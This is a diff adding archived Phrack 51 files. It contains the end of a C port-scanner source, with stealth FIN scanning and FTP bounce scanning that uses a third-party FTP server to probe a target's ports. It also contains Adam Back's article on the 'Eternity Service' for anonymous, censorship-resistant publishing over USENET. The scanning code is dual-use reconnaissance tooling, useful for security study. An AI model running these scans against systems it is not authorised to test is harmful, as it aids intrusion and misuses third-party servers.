+	if (debugging > 1) {	  
+	  printf("Strange packet from target%d!  Here it is:\n", 
+		 ntohs(tcp->th_sport));
+	  if (bytes >= 40) readtcppacket(response,1);
+	  else hdump(response,bytes);
+	}
+    }
+  
+  /* adjust waiting time if neccessary */
+  if (dupesinarow > 6) {
+    if (debugging || verbose)
+      printf("Slowing down send frequency due to multiple late packets.\n");
+    if (timeout < 10 * ((global_delay)? global_delay: global_rtt + 20000)) timeout *= 1.5;
+    else {
+      printf("Too many late packets despite send frequency decreases, skipping scan.\n");
+      if (source_malloc) free(source);
+      return *ports;
+    }
+  }
+
+
+  /* Ok, collect good ports (those that we haven't received responses too 
+     after all our retries */
+  someleft = 0;
+  for(i=0; i < max_parallel_sockets; i++)
+    if (portno[i]) {
+      if (++trynum[i] >= retries) {
+	if (verbose || debugging)
+	  printf("Good port %d detected by fin_scan!\n", portno[i]);
+	addport(ports, portno[i], IPPROTO_TCP, NULL);
+    send_tcp_raw( rawsd, source, &target, MAGIC_PORT, portno[i], 0, 0, 
+		  TH_FIN, 0, 0, 0);
+	portno[i] = trynum[i] = 0;
+      }
+      else someleft = 1;
+    }  
+
+  if (!portarray[j] && (!someleft || --waiting_period <= 0)) done++;
+}
+
+if (debugging || verbose)
+  printf("The TCP stealth FIN scan took %ld seconds to scan %d ports.\n", 
+	 time(NULL) - starttime, number_of_ports);
+if (source_malloc) free(source);
+close(tcpsd);
+close(rawsd);
+return *ports;
+}
+
+int ftp_anon_connect(struct ftpinfo *ftp) {
+int sd;
+struct sockaddr_in sock;
+int res;
+char recvbuf[2048];
+char command[512];
+
+if (verbose || debugging) 
+  printf("Attempting connection to ftp://%s:%s@%s:%i\n", ftp->user, ftp->pass,
+	 ftp->server_name, ftp->port);
+
+if ((sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
+  perror("Couldn't create ftp_anon_connect socket");
+  return 0;
+}
+
+sock.sin_family = AF_INET;
+sock.sin_addr.s_addr = ftp->server.s_addr;
+sock.sin_port = htons(ftp->port); 
+res = connect(sd, (struct sockaddr *) &sock, sizeof(struct sockaddr_in));
+if (res < 0 ) {
+  printf("Your ftp bounce proxy server won't talk to us!\n");
+  exit(1);
+}
+if (verbose || debugging) printf("Connected:");
+while ((res = recvtime(sd, recvbuf, 2048,7)) > 0) 
+  if (debugging || verbose) {
+    recvbuf[res] = '\0';
+    printf("%s", recvbuf);
+  }
+if (res < 0) {
+  perror("recv problem from ftp bounce server");
+  exit(1);
+}
+
+snprintf(command, 511, "USER %s\r\n", ftp->user);
+send(sd, command, strlen(command), 0);
+res = recvtime(sd, recvbuf, 2048,12);
+if (res <= 0) {
+  perror("recv problem from ftp bounce server");
+  exit(1);
+}
+recvbuf[res] = '\0';
+if (debugging) printf("sent username, received: %s", recvbuf);
+if (recvbuf[0] == '5') {
+  printf("Your ftp bounce server doesn't like the username \"%s\"\n", 
+	 ftp->user);
+  exit(1);
+}
+snprintf(command, 511, "PASS %s\r\n", ftp->pass);
+send(sd, command, strlen(command), 0);
+res = recvtime(sd, recvbuf, 2048,12);
+if (res < 0) {
+  perror("recv problem from ftp bounce server\n");
+  exit(1);
+}
+if (!res) printf("Timeout from bounce server ...");
+else {
+recvbuf[res] = '\0';
+if (debugging) printf("sent password, received: %s", recvbuf);
+if (recvbuf[0] == '5') {
+  fprintf(stderr, "Your ftp bounce server refused login combo (%s/%s)\n",
+	 ftp->user, ftp->pass);
+  exit(1);
+}
+}
+while ((res = recvtime(sd, recvbuf, 2048,2)) > 0) 
+  if (debugging) {
+    recvbuf[res] = '\0';
+    printf("%s", recvbuf);
+  }
+if (res < 0) {
+  perror("recv problem from ftp bounce server");
+  exit(1);
+}
+if (verbose) printf("Login credentials accepted by ftp server!\n");
+
+ftp->sd = sd;
+return sd;
+}
+
+int recvtime(int sd, char *buf, int len, int seconds) {
+
+int res;
+struct timeval timeout = {seconds, 0};
+fd_set readfd;
+
+FD_ZERO(&readfd);
+FD_SET(sd, &readfd);
+res = select(sd + 1, &readfd, NULL, NULL, &timeout);
+if (res > 0 ) {
+res = recv(sd, buf, len, 0);
+if (res >= 0) return res;
+perror("recv in recvtime");
+return 0; 
+}
+else if (!res) return 0;
+perror("select() in recvtime");
+return -1;
+}
+
+portlist bounce_scan(struct in_addr target, unsigned short *portarray,
+		     struct ftpinfo *ftp, portlist *ports) {
+int starttime,  res , sd = ftp->sd,  i=0;
+char *t = (char *)&target; 
+int retriesleft = FTP_RETRIES;
+char recvbuf[2048]; 
+char targetstr[20];
+char command[512];
+snprintf(targetstr, 20, "%d,%d,%d,%d,0,", UC(t[0]), UC(t[1]), UC(t[2]), UC(t[3]));
+starttime = time(NULL);
+if (verbose || debugging)
+  printf("Initiating TCP ftp bounce scan against %s (%s)\n",
+	 current_name,  inet_ntoa(target));
+for(i=0; portarray[i]; i++) {
+  snprintf(command, 512, "PORT %s%i\r\n", targetstr, portarray[i]);
+  if (send(sd, command, strlen(command), 0) < 0 ) {
+    perror("send in bounce_scan");
+    if (retriesleft) {
+      if (verbose || debugging) 
+	printf("Our ftp proxy server hung up on us!  retrying\n");
+      retriesleft--;
+      close(sd);
+      ftp->sd = ftp_anon_connect(ftp);
+      if (ftp->sd < 0) return *ports;
+      sd = ftp->sd;
+      i--;
+    }
+    else {
+      fprintf(stderr, "Our socket descriptor is dead and we are out of retries. Giving up.\n");
+      close(sd);
+      ftp->sd = -1;
+      return *ports;
+    }
+  } else { /* Our send is good */
+    res = recvtime(sd, recvbuf, 2048,15);
+    if (res <= 0) perror("recv problem from ftp bounce server\n");
+  
+    else { /* our recv is good */
+      recvbuf[res] = '\0';
+      if (debugging) printf("result of port query on port %i: %s", 
+			    portarray[i],  recvbuf);
+      if (recvbuf[0] == '5') {
+	if (portarray[i] > 1023) {
+	fprintf(stderr, "Your ftp bounce server sucks, it won't let us feed bogus ports!\n");
+	exit(1);
+      }
+      else {
+	fprintf(stderr, "Your ftp bounce server doesn't allow priviliged ports, skipping them.\n");
+	while(portarray[i] && portarray[i] < 1024) i++;
+	if (!portarray[i]) {
+	  fprintf(stderr, "And you didn't want to scan any unpriviliged ports.  Giving up.\n");
+	  /*	  close(sd);
+	  ftp->sd = -1;
+	  return *ports;*/
+	  /* screw this gentle return crap!  This is an emergency! */
+	  exit(1);
+	}
+      }  
+      }
+    else  /* Not an error message */
+      if (send(sd, "LIST\r\n", 6, 0) > 0 ) {
+	res = recvtime(sd, recvbuf, 2048,12);
+	if (res <= 0)  perror("recv problem from ftp bounce server\n");
+	else {
+	  recvbuf[res] = '\0';
+	  if (debugging) printf("result of LIST: %s", recvbuf);
+	  if (!strncmp(recvbuf, "500", 3)) {
+	    /* fuck, we are not aligned properly */
+	    if (verbose || debugging)
+	      printf("misalignment detected ... correcting.\n");
+	     res = recvtime(sd, recvbuf, 2048,10);
+	  }
+	  if (recvbuf[0] == '1' || recvbuf[0] == '2') {
+	    if (verbose || debugging) printf("Port number %i appears good.\n",
+				portarray[i]);
+	    addport(ports, portarray[i], IPPROTO_TCP, NULL);
+	    if (recvbuf[0] == '1') {
+	    res = recvtime(sd, recvbuf, 2048,5);
+	    recvbuf[res] = '\0';
+	    if ((res > 0) && debugging) printf("nxt line: %s", recvbuf);
+	    }
+	  }
+	}
+      }
+    }
+  }
+}
+if (debugging || verbose) 
+  printf("Scanned %d ports in %ld seconds via the Bounce scan.\n",
+	 number_of_ports, time(NULL) - starttime);
+return *ports;
+}
+
+/* parse a URL stype ftp string of the form user:pass@server:portno */
+int parse_bounce(struct ftpinfo *ftp, char *url) {
+char *p = url,*q, *s;
+
+if ((q = strrchr(url, '@'))) /*we have username and/or pass */ {
+  *(q++) = '\0';
+  if ((s = strchr(q, ':')))
+    { /* has portno */
+      *(s++) = '\0';
+      strncpy(ftp->server_name, q, MAXHOSTNAMELEN);
+      ftp->port = atoi(s);
+    }
+  else  strncpy(ftp->server_name, q, MAXHOSTNAMELEN);
+
+  if ((s = strchr(p, ':'))) { /* User AND pass given */
+    *(s++) = '\0';
+    strncpy(ftp->user, p, 63);
+    strncpy(ftp->pass, s, 255);
+  }
+  else { /* Username ONLY given */
+    printf("Assuming %s is a username, and using the default password: %s\n",
+	   p, ftp->pass);
+    strncpy(ftp->user, p, 63);
+  }
+}
+else /* no username or password given */ 
+  if ((s = strchr(url, ':'))) { /* portno is given */
+    *(s++) = '\0';
+    strncpy(ftp->server_name, url, MAXHOSTNAMELEN);
+    ftp->port = atoi(s);
+  }
+  else  /* default case, no username, password, or portnumber */
+    strncpy(ftp->server_name, url, MAXHOSTNAMELEN);
+
+ftp->user[63] = ftp->pass[255] = ftp->server_name[MAXHOSTNAMELEN] = 0;
+
+return 1;
+}
+
+
+ 
+/*
+ *      I'll bet you've never seen this function before (yeah right)!
+ *      standard swiped checksum routine.
+ */
+unsigned short in_cksum(unsigned short *ptr,int nbytes) {
+
+register long           sum;            /* assumes long == 32 bits */
+u_short                 oddbyte;
+register u_short        answer;         /* assumes u_short == 16 bits */
+
+/*
+ * Our algorithm is simple, using a 32-bit accumulator (sum),
+ * we add sequential 16-bit words to it, and at the end, fold back
+ * all the carry bits from the top 16 bits into the lower 16 bits.
+ */
+
+sum = 0;
+while (nbytes > 1)  {
+sum += *ptr++;
+nbytes -= 2;
+}
+
+/* mop up an odd byte, if necessary */
+if (nbytes == 1) {
+oddbyte = 0;            /* make sure top half is zero */
+*((u_char *) &oddbyte) = *(u_char *)ptr;   /* one byte only */
+sum += oddbyte;
+}
+
+/*
+ * Add back carry outs from top 16 bits to low 16 bits.
+ */
+
+sum  = (sum >> 16) + (sum & 0xffff);    /* add high-16 to low-16 */
+sum += (sum >> 16);                     /* add carry */
+answer = ~sum;          /* ones-complement, then truncate to 16 bits */
+return(answer);
+}
+<-->
+
+
+----[  EOF
+
diff --git a/phrack51/12.txt b/phrack51/12.txt
new file mode 100644
index 0000000..cddfabd
--- /dev/null
+++ b/phrack51/12.txt
@@ -0,0 +1,2150 @@
+---[  Phrack Magazine   Volume 7, Issue 51 September 01, 1997, article 12 of 17
+
+
+-------------------------[  The Eternity Service
+
+
+--------[  Adam Back <aba@dcs.exe.ac.uk>
+
+
+
+Information wants to be Free
+======================================================================
+
+Information wants to be free.  Censorship sucks.  Having your account yanked 
+because some censorious idiot doesn't like you discussing hacking tips and 
+tricks in USENET sucks.  Being tortured to death by some totalitarian 
+country's military police for speaking the truth about government corruption 
+sucks even more.  
+
+Have friends who have been hounded by the Feds, SPA software police, or 
+system admins who believe in security by obscurity?  Had nasty threats made by 
+censorious system admins for helpfully drawing their attention to flaws in their
+systems security?  Ever had a control freak try to get your web pages
+censored because they don't like its content, or simply because they get their 
+kicks harassing people?  Ever wanted to publish something on the 'Net but felt 
+intimidated by censors?
+
+Do you consider that free speech is your right as guaranteed by the first 
+amendment of the US constitution, and do you therefore also consider it your 
+right to speak anonymously?  There are lots of reasons to protect the ability 
+to speak anonymously.  Anonymous speech is required for truly free speech.  
+Strongly anonymous free speech is the freest speech of all. If you're going to 
+preserve your ability to speak anonymously, and protect your right to free 
+speech you might as well do it properly...
+
+Want to do something to help free speech?  Want to piss off the 'Net censors?  
+Want to piss off censorious Governments?  Read on...
+
+
+What is the Eternity Service?
+======================================================================
+
+The Eternity Service is a distributed data-haven, it takes a different
+approach to ensuring unpopular content can be published.  Traditionally 
+unpopular content has been surreptitiously exchanged via DCCs in IRC, or PGP 
+encrypted email, or FSP, or in funny named directories via FTP or via agreed 
+file names in incoming directories set drwx-wx-wx.  Other kinds of unpopular 
+content have been published on web pages for a short time until the censor 
+gets to work and threatens the ISP, the publisher's employee, and the publisher 
+with law suits.  Sometimes these web pages get mirrored, if there is someone
+interested, and spoiling for a fight, or if the content is only censored by 
+force of law in one jurisdiction.
+
+The Eternity Service deals with censorship more directly: it confronts the 
+problem in a more general way with the aim that anyone should be able to 
+publish anything anonymously in a convenient persistent, uncensorable 
+data-haven.
+
+So in a nut-shell that is the design goal of the eternity service, to allow 
+anyone to publish material which others would like to censor. For convenience 
+the publishing medium addressed is the World Wide Web.
+
+Systems for publishing anonymously in USENET news and email already exist: 
+cypherpunks type I and type II (mixmaster) remailers.
+
+
+Why the name `Eternity Service'?
+======================================================================
+
+There is a cryptographic paper by Ross Anderson called "The Eternity Service",
+which is where the idea for this implementation came from.  I rather liked 
+Ross's name for his conceptual service, and instead of thinking up some other 
+name I just "borrowed" his name.  Readers might find his paper interesting, 
+it's on the web in htmlized form at:
+
+    http://www.cl.cam.ac.uk/users/rja14/eternity/eternity.html
+
+Ross's design is quite ambitious, so I simplified his design in developing the 
+software included with this article.
+
+My implementation shares Ross's main design goal, which is to create a
+censorship-proof, long-term document store, but its design has been made much 
+simpler and less ambitious initially to make it easier to implement.  The main 
+simplification is that I built the design on top of an existing hard-to-censor 
+distributed distribution channel: `alt' USENET newsgroups.  This design is 
+described in the next sections.
+
+The motivation for providing a simplified version was to have something people 
+could use practically, today.  Another reason is that by releasing this 
+design, and it's implementation, it allows you, the reader, to play with it, 
+and to contribute to it, improve it in a piecewise fashion in the good 
+tradition of free software on the 'Net.  The design calls for many eternity 
+servers to be in existence to make it hard to censor.
+
+At time of writing a mailing list exists for discussion on using and improving 
+the eternity service.  Instructions on how to subscribe the eternity mailing 
+list are given at the bottom of this article.
+
+
+USENET and distributed systems
+======================================================================
+
+The Internet was built to survive nuclear attack.  It would survive such an
+attack because it is a distributed system.  Distributed systems are hard to 
+break, and therefore, hard to censor.  USENET, particularly the `alt` 
+newsgroups offer the most amazing chaotic discussion areas.  The articles 
+which are posted often contain materials which would be considered illegal in
+many jurisdictions.  And yet USENET lives, and `alt` USENET newsgroups thrive. 
+Extremely well funded attackers have tried to remove individual `alt` USENET 
+groups, and to censor posts in alt USENET groups.  They have all failed.
+
+The reason that USENET is hard to attack is because it is a distributed
+system.  The network of news feeds has some redundancy.  USENET articles enter 
+the news distribution network from anywhere in the network.  If a censor in 
+one country succeeds in persuading a news site to censor its feed and not
+carry particular alt groups, it doesn't affect the overall system that much.  
+There are lots of other nodes carrying the groups, disgruntled users will 
+switch ISPs, and disgruntled down-feed sites will switch feeds.  The system 
+routes *around* censorship.  There are just so many USENET admins with 
+individual opinions, and commercial interests in carrying groups users want to
+read, that USENET can not die.
+
+It occurred to me in trying to design a simplified eternity service, that it 
+would be useful to borrow some of Usenet's indestructible nature.  USENET is 
+part of the landscape; it's here to stay.  If we build a new distributed 
+distribution system from scratch, to start with there won't be many nodes.  
+The censor will have any easy time censoring a few nodes, he'll just go and 
+harass each of them in turn.
+
+With USENET on the other hand, it has been around for so long, and is carried 
+at so many sites that it would be a huge task for a censor to even have a 
+significant affect on USENET.
+
+So, the design of my eternity server aims to allow operators to point the 
+finger at USENET and say: "that's where the content is coming from, if you 
+want to censor anything go attack USENET".
+
+My eternity server design is a service designed to blur the differences 
+between USENET news and the Web.  It provides an interface which makes a 
+stream of encrypted USENET news articles look like WWW pages with a persistent 
+URL.  As the default disclaimer for eternity servers says:
+
+    Note to censors: Eternity servers are specialized search engines for
+    reading web documents from USENET news. The pages you request are
+    actually USENET news posts which the server is searching for,
+    reformatting and forwarding to you. The administrator of this server
+    has no control over the content of USENET news, and will not be held
+    responsible for any documents you instruct this server to forward
+    for you.
+
+
+Eternity Server design
+======================================================================
+
+Once you accept the idea that it would be nice to borrow, or build upon some 
+of USENET news's strength as a uncensorable distribution mechanism, the next 
+issue is achieving this, technically.  The main differences between USENET 
+news articles and WWW pages is that USENET is transient, the articles expire 
+in newsgroups, and that USENET articles have no persistent globally 
+addressable locator.  USENET is not as convenient as the Web; there are no 
+hypertext links between articles, and there are no inline images.
+
+Eternity service articles are WWW pages specially formatted and posted to 
+USENET news.  The eternity server reads news and translates Web page requests 
+into GROUP and ARTICLE commands to an NNTP news server (or file system 
+accesses to a local news spool).  (The default list of newsgroups to read 
+consists of one group: alt.anonymous.messages).
+
+Web pages are often updated, as one of the interesting aspects of the WWW as a 
+publishing medium is that it allows people to maintain up-to-date information. 
+This maintains interest and keeps people coming back to an interesting site to 
+see what else the author has collected, or what other related pages have been 
+added.  A sense of community can be built up with others submitting interesting
+links, corrections, and tips to the author.
+
+To provide the possibility of updating web pages with the eternity server, the 
+eternity formatting convention allows submitted web pages to be signed with 
+PGP.  This ensures that no one else can replace your pages with other pages.  
+Being able to replace your page with a blank page would allow a censor to 
+temporarily censor you.  (Only temporary because you could always replace the 
+blank page with the real document again).
+
+With a PGP signature this is prevented... and the system becomes such that 
+eternity virtual domains are very much first-come first-served.
+
+
+First-come first-served naming
+======================================================================
+
+Eternity URLs are all under the non-existent Top Level Domain (TLD) "eternity".
+(Other TLDs being .com, .org, .edu, .ai, etc) Eternity URLs are therefore of 
+the form:
+
+    http://*eternity/*
+
+Where * represents any string of characters.
+
+On the Internet domain names must be resolved to IP addresses via Domain Name 
+Servers (DNS).  The owner of the TLD you desire a domain name in charges you 
+for registering a domain.  Internic (who currently has a hotly contested 
+monopoly on TLDs .com, .org, and .net), charge $100 for the first 2 years, and 
+$50 for each year thereafter.
+
+Eternity domains don't exist in this sense.  There is no root domain server for 
+eternity.  You don't need to buy eternity URLs from anyone.  Nobody _can_ own 
+an eternity URL in the normal sense.
+
+The first person to submit a document with a URL:
+
+    http://bluebox.eternity/
+
+gets it.  If that person signed the submitted document with PGP, no one will 
+be able to take over that URL.  If that person signed the submitted page with 
+PGP and threw away the key, it would be uncensorable for all time.  They 
+couldn't even remove the document themselves if they wanted to.  Throwing away 
+the key might be a good idea if the publisher isn't publishing anonymously and 
+expects reprisals.
+
+The fact that one user has submitted a signed web page for 
+http://bluebox.eternity/ doesn't stop BlackBeard from putting up his design at:
+
+    http://bluebox.eternity/blackbeard/
+
+That is to say ownership of any given URL, even the top level URL of a virtual 
+domain, doesn't give any control over who could submit documents in that 
+virtual domain.  Of course you don't have to link to their pages.  But those 
+pages will show in a directory search of your virtual site.
+
+
+Directory searches
+======================================================================
+
+Submitted eternity news articles can set options controlling whether or not 
+the document is listed in the index.  The choice is either "exdirectory" (the 
+default) or "directory".  This is useful because if you created the URL for 
+http://bluebox.eternity/, you might like to include some inline images, or 
+diagrams, or a series of other pages hypertext linked from that page.  So you 
+would set option "directory" for the main page http://bluebox.eternity/, and 
+set all the inline images and smaller pages linked from it to "exdirectory", 
+as a convention to save the directory becoming cluttered up with junk.
+
+You can also use "exdirectory" if you don't want to generally advertise your 
+page.  Note this is not all that secure if you access your page via a public 
+access eternity server, as the server operator could modify the server to 
+record all exdirectory URLs.
+
+You can request a listing of all eternity pages at an eternity server by 
+filling in the form with virtual URL containing a wild-card:
+
+    http://*
+
+(Exdirectory documents will not be listed.)
+
+You can also include an option to give a small description (a maximum of 60
+characters) which will be listed beside your virtual URL when someone does 
+such a search.
+
+You can narrow the search to just list all root eternity documents with:
+
+    http://*/
+
+Which will find:
+
+    http://eternity/
+    http://bluebox.eternity/
+
+but not:
+
+    http://test.eternity/example1/
+
+
+You can also do:
+
+    http://bluebox.eternity/*
+
+which will find:
+
+    http://bluebox.eternity/
+    http://bluebox.eternity/blackbeard/
+
+
+You can combine *s to find what you want.  Advanced searches are possible:
+
+    http://*box*.eternity/*blue*
+
+and so on.
+
+Eternity materials are likely to be targets for censors, and it is possible 
+that they might try to censor the directory listing itself.  Even the URL 
+could suffer.  (Did you know that Internic turned down some guy who wanted to 
+register `fuck.com'?)  I'm sure someone creative could up with something to 
+upset a censor in the 60 characters allocated for URL descriptions too.
+
+For these reasons the eternity server operator has the option to disable 
+directory service.  With this option disabled looking up URLs with wild-cards 
+(*s) in them will get back a notice explaining that directory listings service 
+has not been turned on at this server.
+
+Servers with directory service turned off make less useful servers, so it is 
+hoped that most eternity server operators don't have to do this.  However, an 
+eternity server with directory service turned off still works normally for 
+accessing known URLs, and you could maintain the directory listing yourself, 
+or use a directory listing at another site.
+
+
+Formatting Eternity documents 
+======================================================================
+
+Eternity documents submitted as USENET news articles are formatted with PGP.  
+There are three of reasons to format messages in USENET to make them not 
+immediately readable.
+
+1) It prevents censors from working out which articles correspond to which 
+eternity web pages.  Depending on the options chosen this can degrade to just 
+obfuscation.  Obfuscation alone however can be useful as censors are often not 
+particularly clue-full.
+
+2) PGP includes compression, so the articles are much smaller.
+
+3) If used with highest security options amongst a group of people who follow 
+security guidelines it means that a censor will have no way to translate the 
+articles back into WWW pages, or even of obtaining the URL.
+
+To demonstrate the formatting requirements for eternity page submissions, we'll
+work with an example page, http://bluebox.eternity/.
+
+You'll need an implementation of SHA1 for this.  There is a C implementation, 
+and also a perl implementation in the eternity server distribution.  Some 
+systems may already have /usr/local/bin/sha1.
+
+(Note: below "echo -n" is used -- on Suns the built-in echo doesn't handle the 
+-n flag properly -- you'll have to use /usr/ucb/echo instead)
+
+0) Generate a Nom de Plume
+
+If you are planning to sign your document, you probably won't want to sign it 
+with your normal key, so you'll generate a new keypair for the purpose, this 
+will be your pseudonym, or Nom de Plume for the purposes of publishing this 
+document.  The "-u fred" tells pgp to use that user id.  See pgp documentation 
+for how to generate keys (use pgp -kg).
+
+Once you've generated your key, extract it to a file with:
+
+    % pgp -kxa fred fred
+
+where `fred` is your new user name.  It will save the key as "fred.asc".  
+We'll use this file below.
+
+
+1) Sign the document
+
+We create a normal web page such as you might put on your home page.  You can 
+view the page with Netscape (or other browser) by opening it as a file URL: 
+file:/home/fred/bluebox/index.html to check that it looks OK, and that any 
+inline images line up correctly etc.
+
+You can use relative, site relative, and absolute URLs normally in eternity 
+documents.  You can also use absolute URLs pointing at other sites in the 
+normal way.
+
+To submit index.html as http://bluebox.eternity/ we first use PGP to ASCII 
+armor the document.  If we want to sign it at the same time as ASCII armoring 
+it, so that we can update it later, we can do:
+
+    % pgp -sa index.html -u fred
+
+There is another option to encrypt as well as sign and armor, which will be 
+discussed more below, to do this do:
+
+    % pgp -csa index.html -u fred
+
+If we don't want to sign it, we do this instead:
+
+    % pgp -a index.html
+
+In either case after this operation PGP will create file "index.asc" for us.  
+Rename index.asc to something else, say "index" (Another legal combination 
+would be to encrypt and not sign with -ca).
+
+
+2) Set the options
+
+If you signed the document, you need to include the key.  Insert the keyfile 
+(fred.asc extracted in step 0 above) into the document "index".  Order is not 
+significant.  Then the ASCII armored document (pgp munged html or gif file 
+produced in stage 1), the keyfile "fred.asc", and the flags described below 
+can be jumbled up in order.
+
+You now have several flags you can include to control how your URL will be 
+cached, how it will be displayed in indexes etc.
+
+The flags are:
+
+    URL: http://bluebox.eternity/
+
+The flag URL: sets what the eternity virtual URL will be.  It must have 
+.eternity as the virtual TLD.
+
+    Cache: yes
+    Cache: encrypted
+    Cache: no
+
+Cache settings, choose one of those.  These cache settings override the used 
+eternity server's settings if doing so will increase security.  "yes" and "no"
+are obvious.  "encrypted" means that the document will be cached but it will 
+be encrypted in the cache in such a way that the URL is required to decrypt it.
+If the document is exdirectory this means that the server won't know the URL.
+
+    Options: directory
+    Options: exdirectory
+
+Choose one of those options.  This flag controls whether the URL will be listed
+in the URL index.  "directory" means it will be listed, "exdirectory" means it
+will not be listed.  If you give neither option the document defaults to 
+exdirectory.
+
+    Description: Freds blue box page
+
+This is the description that will appear in directory listings.  If the 
+document is exdirectory there is no point giving a description.
+
+So the file "index" is likely to look something like this once you've finished 
+editing it:
+
+    URL: http://bluebox.eternity/
+    Cache: yes
+    Options: directory
+    Description: Freds blue box page
+
+    -----BEGIN PGP PUBLIC KEY-----
+    ...
+    -----END PGP PUBLIC KEY-----
+
+    -----BEGIN PGP MESSAGE-----
+    ...
+    -----BEGIN PGP MESSAGE-----
+
+Where ... indicates the rest of the ASCII armored key or message will be 
+displayed.  Some of these parts can be omitted as shown above.  When you are 
+submitting an web page update you can omit anything you're not trying to 
+change.  (That can be everything, so your updated document has nothing but the 
+new message part).  However this is not necessarily a good idea because it 
+will not make sense to an eternity server that has not seen the first 
+document, for example if your first document doesn't make it via USENET to one
+site.
+
+3) Package the document "index" ready for posting
+
+You have a couple of choices here.  
+
+Method A (most common):
+
+Either you can encrypt with PGP -c:
+
+    % pgp -c -z"eternity" index
+
+Method B:
+
+Or you can encrypt with the SHA1 of the URL with 1 prefixed,
+
+    % echo -n 1http://bluebox.eternity/ | sha1
+    dab1a32aba30b4e3a9594da143c33d2ba9b00a38
+    % pgp -c -z"dab1a32aba30b4e3a9594da143c33d2ba9b00a38" index
+
+Most normal eternity URLs which you're expecting to be indexed on the 
+directory services of public access eternity servers should be encrypted with 
+the first simpler method.
+
+There's not that much point encrypting with the second method unless your 
+document is going to be exdirectory, because once the document gets in the URL 
+everyone will know the URL anyway.  It might take a censor a little longer to 
+figure out.
+
+If you were planning to only access the document via private, or local 
+eternity servers, you can reveal the URL only to those you wish to have access.
+However this might not be that secure because people may be able to guess your
+URL if it is something common as above.
+
+Method C:
+
+For this reason you have a third option, which is to encrypt at the same time 
+as signing and ASCII armoring as described in step 1.  You can combine that 
+option with above method B (pgp -c with sha1 of 1<URL>) to conceal the URL.  
+
+Or alternately you can expose the URL by using method 1 above (pgp -c 
+-z"eternity"), but have the document encrypted in step 1.  (This would allow 
+you to have a directory entry, but the page not accessible without knowing the 
+password chosen in step 1 when encrypting.
+
+The result of the last pgp -c operation for any of method A, B, or C will be 
+file "index.asc".
+
+4) Post the article anonymously
+
+The subject field of the article should always be the SHA1 hash of the URL:
+
+    % echo -n http://bluebox.eternity/ | sha1
+    2e730bcd62dbc63aaedde56c06625abeeb38dd92
+
+Now post the article to USENET news (by default eternity servers read only 
+newsgroup alt.anonymous.messages with release 0.10).
+
+You can test your eternity submissions work by installing an eternity server 
+on localhost.  If you get stuck you could ask for assistance on the eternity 
+mailing list (instructions on subscribing are at the bottom of this article).
+
+To post anonymously you'll need to post via anonymous remailers.  Some 
+remailers can post to USENET directly, for other remailers you have to post 
+via a mail2news gateway.
+
+Instructions on using remailers, and windows and Unix clients to automate the 
+process of using remailers can be found here:
+
+    http://www.stack.nl/~galactus/remailers/
+
+You can find a list of mail2news gateways here:
+
+    http://www.replay.com/mail2news/
+
+People are already working on a nice easy to use CGI interface to eternity 
+servers over on the eternity list while I'm typing, so perhaps when you read 
+this you won't need to know the above information in such detail.
+
+
+Caching
+======================================================================
+
+With WWW technology, caching is often used to speed up accesses.  There are a 
+number of caches in effect with a typical web browsing session.  The Netscape 
+browser for instance has both a memory cache, and a disk cache, which are 
+configurable in size.  In addition Netscape can be set up to use a proxy cache,
+which is a special caching service.  Users of a proxy cache send their web 
+requests through it.  The proxy cache checks each request to see if it has it
+in the cache, if it does, it can deliver it back if quickly.  If it doesn't it 
+will go and fetch whatever URL you are asking for and remember it for next 
+time.  A proxy cache would normally be used by a group of web users, perhaps a 
+university campus, or an ISPs customers, or a companies employees.
+
+Caches traditionally have some protection from censors -- it's an automated 
+process after all -- your average ISP hardly wants to be responsible for the 
+contents of the disk on its proxy cache machine.
+
+For performance reasons the eternity server also has a cache.  The cache 
+behavior is configurable.  The server operator can set his caching preferences 
+when he installs the server by editing eternity.conf.  Possible settings are 
+"on", "off" and "encrypted".  Setting cache to "off" is safest, then you have 
+no eternity documents on your disk.  The "encrypted" cache option means that 
+cached documents are encrypted with PGP -c and the SHA1 hash of a 1 prepended
+to the URL.  If the server also turns off directory service, and does no 
+logging this provides reasonable deniability of knowledge of contents of 
+documents in the cache.  Even with directory service on, it provides cache set 
+to "encrypted" provides protection in that the server operator will not know 
+the URLs of exdirectory web pages.
+
+
+Further work
+======================================================================
+
+There are a few unimplemented features that could use some work.  These 
+features are being discussed on the eternity mailing list (see instructions 
+for subscribing below).
+
+A first immediate problem is that the eternity server has no cache replacement 
+policy.  Your eternity cache will just keep growing.  This is great for 
+ensuring articles with caching turned on don't disappear due to expiring in 
+the news spool, but as eternity grows more popular it will become impossible 
+for each single eternity server to hold the full document store.
+
+The solution to this problem is quite complex, and is the subject of the next 
+implementation effort on the mailing list.  One interim solution is to use the 
+USENET searching facilities of services which archive USENET such as 
+www.dejanews.com and www.altavista.digital.com.
+
+There are several tweaks that would have to be done to be able to use USENET 
+archivers as sources of eternity documents.  Two main problems have to be 
+combated: 1) the archives make attempts not to archive 7-bit encoded binaries 
+to save space, 2) you can't search by 40 character hex numbers to find subject
+fields.  These are both easy to overcome, but the overall solution is not that 
+attractive because the archivers will be a single point of failure.  Censors 
+will attack them, and they may be hostile to eternity servers due to our 
+bypassing their 7-bit encoding filters and consuming space on their soon to be
+multiple TB raid file servers.
+
+A better solution is to build a distributed data store that allows eternity 
+servers to exchange documents with each other in such a way that the eternity 
+servers together form a virtual raid file-server where the documents are 
+spread randomly and redundantly over the nodes.
+
+A simple starting point to allow this is to create a second long-term cache 
+area, and to have a cache replacement policy for that area which selects a 
+random document for discarding.  This cache replacement policy will ensure 
+that statistically some servers will have a given document.  Next we have to 
+design a scalable method of forwarding requests to other servers to ask for 
+old USENET articles by URL hash (subject field).
+
+
+World-FS
+======================================================================
+
+Another approach to improving the eternity server is to actually use and 
+develop the full set of techniques described in Ross Anderson's paper to build 
+a distributed file system (DFS).  I dub this direction `world-FS' because the 
+aim is to build a worldwide distributed, redundant, uncensorable, and virtual 
+file system.  This file system would be designed to withstand a nuclear war, 
+and to easily withstand the best efforts of one government to censor material 
+in it.  A world-FS done well could easily replace the current pattern of web 
+page hosting.  
+
+The world-FS would have different interfaces, or drivers, to allow it to be 
+accessed as an NFS file system, or as a distributed web based eternity service.
+The eternity server described in this document would then be superseded, and 
+become the HTTP driver interface for world-FS.  An FTP, or NNTP (USENET news) 
+interface could also be built for the world-FS, or for parts of it's directory 
+tree.  People discussing this so far have thought that you would need to 
+include ability to pay for service with an anonymous payment system (or with
+multiple payment systems).
+
+The eternity mailing list is also for discussion of world-FS, as it all falls 
+under the umbrella of Ross Anderson's concept of an `eternity service'.
+
+
